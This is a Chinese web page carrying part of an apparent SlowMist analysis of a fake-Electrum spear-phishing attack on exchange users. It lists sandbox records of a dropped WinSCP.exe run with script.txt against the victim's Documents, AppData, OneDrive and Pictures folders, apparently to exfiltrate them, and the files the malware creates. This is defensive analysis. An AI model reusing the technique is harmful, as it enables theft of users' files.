织梦CMS - 轻松建站从此开始!
高级搜索|网站地图|TAG标签RSS订阅[设为首页] [加入收藏]

我的网站

搜索

热门标签:

当前位置: 主页 > 区块链

慢雾:技术分析针对交易所用户的伪 Electrum 鱼叉钓鱼攻击 (2)

时间:2020-06-11 16:42来源:未知 作者:admin 点击:
(4)行为描述: 创建新文件进程 详情信息: [0x00000c30]ImagePath = C:DOCUME~1ADMINI~1LOCALS~1Temp.nsis_filesWinSCP.exe, CmdLine = C:DOCUME~1ADMINI~1LOCALS~1Temp.nsis_filesWinSCP.exe

  (4)行为描述: 创建新文件进程

  详情信息:

  [0x00000c30]ImagePath = C:DOCUME~1ADMINI~1LOCALS~1Temp.nsis_filesWinSCP.exe, CmdLine = "C:DOCUME~1ADMINI~1LOCALS~1Temp.nsis_filesWinSCP.exe" /ini=null /script="script.txt" /log="winscp_documents.log" /loglevel=0 /parameter "C:Documents and SettingsAdministratorMy Documents" "09-06-2020-4:51:51_documents"      [0x00000c44]ImagePath = C:DOCUME~1ADMINI~1LOCALS~1Temp.nsis_filesWinSCP.exe, CmdLine = "C:DOCUME~1ADMINI~1LOCALS~1Temp.nsis_filesWinSCP.exe" /ini=null /script="script.txt" /log="winscp_appdata.log" /loglevel=0 /parameter "C:Documents and SettingsAdministratorApplication Data" "09-06-2020-4:51:51_appdata"      [0x00000c5c]ImagePath = C:DOCUME~1ADMINI~1LOCALS~1Temp.nsis_filesWinSCP.exe, CmdLine = "C:DOCUME~1ADMINI~1LOCALS~1Temp.nsis_filesWinSCP.exe" /ini=null /script="script.txt" /log="winscp_localappdata.log" /loglevel=0 /parameter "C:Documents and SettingsAdministratorLocal SettingsApplication Data" "09-06-2020-4:51:51_localappdata"      [0x00000c64]ImagePath = C:DOCUME~1ADMINI~1LOCALS~1Temp.nsis_filesWinSCP.exe, CmdLine = "C:DOCUME~1ADMINI~1LOCALS~1Temp.nsis_filesWinSCP.exe" /ini=null /script="script.txt" /log="winscp_onedrive.log" /loglevel=0 /parameter "C:Documents and SettingsAdministratorOneDrive" "09-06-2020-4:51:51_onedrive"      [0x00000c6c]ImagePath = C:DOCUME~1ADMINI~1LOCALS~1Temp.nsis_filesWinSCP.exe, CmdLine = "C:DOCUME~1ADMINI~1LOCALS~1Temp.nsis_filesWinSCP.exe" /ini=null /script="script.txt" /log="winscp_pictures.log" /loglevel=0 /parameter "C:Documents and SettingsAdministratorPictures" "09-06-2020-4:51:51_pictures"

  (5)文件行为

  行为描述: 创建文件

  详情信息:

  C:Documents and SettingsAdministratorLocal SettingsTempsi9.tmp      C:Documents and SettingsAdministratorLocal SettingsTemp.nsis_filesWinSCP.exe      C:Documents and SettingsAdministratorLocal SettingsTemp.nsis_filesscript.txt      C:Documents and SettingsAdministratorLocal SettingsTemp.nsis_filessetup.exe      C:Documents and SettingsAdministratorLocal SettingsTempsyA.tmp      C:Documents and SettingsAdministratorLocal SettingsTempsyA.tmpSystem.dll      C:Documents and SettingsAdministratorApplication Datawinscp.rnd      C:Documents and SettingsAdministratorLocal SettingsTemp.nsis_fileswinscp_appdata.log      C:Documents and SettingsAdministratorLocal SettingsTemp.nsis_fileswinscp_onedrive.log      C:Documents and SettingsAdministratorLocal SettingsTemp.nsis_fileswinscp_localappdata.log      C:Documents and SettingsAdministratorLocal SettingsTemp.nsis_fileswinscp_documents.log      C:Documents and SettingsAdministratorLocal SettingsTemp.nsis_fileswinscp_pictures.log      C:Documents and SettingsAdministratorLocal SettingsTemp.nsis_filesull

   (责任编辑:admin1)
织梦二维码生成器
顶一下
(0)
0%
踩一下
(0)
0%
------分隔线----------------------------
发表评论
请自觉遵守互联网相关的政策法规,严禁发布色情、暴力、反动的言论。
评价:
表情:
用户名: 验证码:点击我更换图片
最新评论 进入详细评论页>>
栏目列表
推荐内容
热点内容

Powered by DedeCMS_V57_UTF8_SP2 © 2007-2021 DesDev Inc.

Copyright © 2007-2021 上海卓卓网络科技有限公司